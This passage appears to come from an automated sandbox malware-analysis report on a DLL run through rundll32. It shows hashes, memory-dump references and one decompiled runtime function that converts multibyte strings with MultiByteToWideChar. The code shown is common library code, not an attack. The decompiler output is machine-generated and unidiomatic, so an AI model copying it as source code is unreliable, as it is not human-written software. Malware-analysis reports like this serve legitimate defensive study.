                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8H_prolog3_Throw
                          • String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
                          • API String ID: 2985221223-1287915644
                          • Opcode ID: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
                          • Instruction ID: c772e41be5f7b2f332d735131a26b9f89d4a247c623edb0674636bff832eaf76
                          • Opcode Fuzzy Hash: 31da3b1f44f4be00057729179f4b672d7c9ef136296f14a90f710bfa915b1374
                          • Instruction Fuzzy Hash: 9A0180B586860DAFD7129FE5C848FECB3FBBF26316F10891A9080960E0EB741685C752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E254B79, Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E254B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6E231F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6E242281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6E242281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6E258CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6E242281())) = 0x16;
					return E6E24215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                          0x6e254b79
                          0x6e254b82
                          0x6e254b87
                          0x6e254b8a
                          0x6e254b8e
                          0x6e254b9d
                          0x6e254ba0
                          0x6e254bc0
                          0x6e254bc5
                          0x6e254bc8
                          0x6e254bca
                          0x6e254c98
                          0x6e254c9e
                          0x6e254cb3
                          0x6e254cbf
                          0x6e254cc5
                          0x6e254cc7
                          0x6e254cd6
                          0x6e254cd6
                          0x6e254cd6
                          0x6e254cd9
                          0x6e254cd9
                          0x6e254cdd
                          0x6e254cdf
                          0x6e254ce2
                          0x6e254ce2
                          0x6e254ce2
                          0x6e254ce2
                          0x00000000
                          0x6e254ce9
                          0x6e254cce
                          0x00000000
                          0x6e254cce
                          0x6e254ca0
                          0x6e254ca3
                          0x6e254ca3
                          0x6e254ca6
                          0x6e254ca6
                          0x6e254ca8
                          0x6e254ca9
                          0x6e254ca9
                          0x6e254cad
                          0x00000000
                          0x6e254cad
                          0x6e254bd0
                          0x6e254bd6
                          0x6e254c03
                          0x6e254c0f
                          0x6e254c15
                          0x6e254c17
                          0x00000000
                          0x00000000
                          0x6e254c1d
                          0x6e254c23
                          0x6e254c26
                          0x6e254c82
                          0x6e254c87
                          0x6e254c8f
                          0x00000000
                          0x6e254c8f
                          0x6e254c28
                          0x6e254c2b
                          0x6e254c2d
                          0x6e254c30
                          0x6e254c32
                          0x6e254c34
                          0x6e254c6a
                          0x6e254c78
                          0x6e254c7e
                          0x6e254c80
                          0x6e254c94
                          0x00000000
                          0x6e254c94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254c36
                          0x6e254c36
                          0x6e254c36
                          0x6e254c39
                          0x6e254c3c
                          0x6e254c3e
                          0x00000000
                          0x00000000
                          0x6e254c48
                          0x6e254c4f
                          0x6e254c52
                          0x6e254c54
                          0x6e254c5c
                          0x6e254c5c
                          0x6e254c5f
                          0x6e254c60
                          0x6e254c63
                          0x6e254c65
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254c65
                          0x6e254c56
                          0x6e254c57
                          0x6e254c5a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254c5a
                          0x6e254c67
                          0x00000000
                          0x6e254c67
                          0x6e254bd8
                          0x6e254bda
                          0x00000000
                          0x00000000
                          0x6e254be0
                          0x6e254be3
                          0x6e254be7
                          0x6e254bea
                          0x6e254bee
                          0x00000000
                          0x00000000
                          0x6e254bf4
                          0x6e254bf5
                          0x6e254bf8
                          0x6e254bfa
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e254bfc
                          0x00000000
                          0x6e254be3
                          0x6e254ba7
                          0x00000000
                          0x6e254bb2
                          0x6e254b94
                          0x6e254b9a
                          0x00000000
                          0x6e254b9a
                          0x6e254cf1

                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,F9AC1F88,F9AC1F88,00000000,00000000,00000000,00000000,00000000), ref: 6E254C0F
                          • GetLastError.KERNEL32 ref: 6E254C1D
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E254C78
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID:
                          • API String ID: 1717984340-0
                          • Opcode ID: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
                          • Instruction ID: 8775ab3d8009a28f0ed7ee8adb2f68d99103e5b50beb331d8458cda2a1d64c2a
                          • Opcode Fuzzy Hash: 748f9f023c2ef1d0e81fdd432eb7eb7e7dce34a43049119b14ba9d2de7faa853
                          • Instruction Fuzzy Hash: 3E41F77560424FAFDB518FD5C944BAAB7BAAF81322F104159E857AB390DB318932CB50
                          Uniqueness

                          Uniqueness Score: -1.00%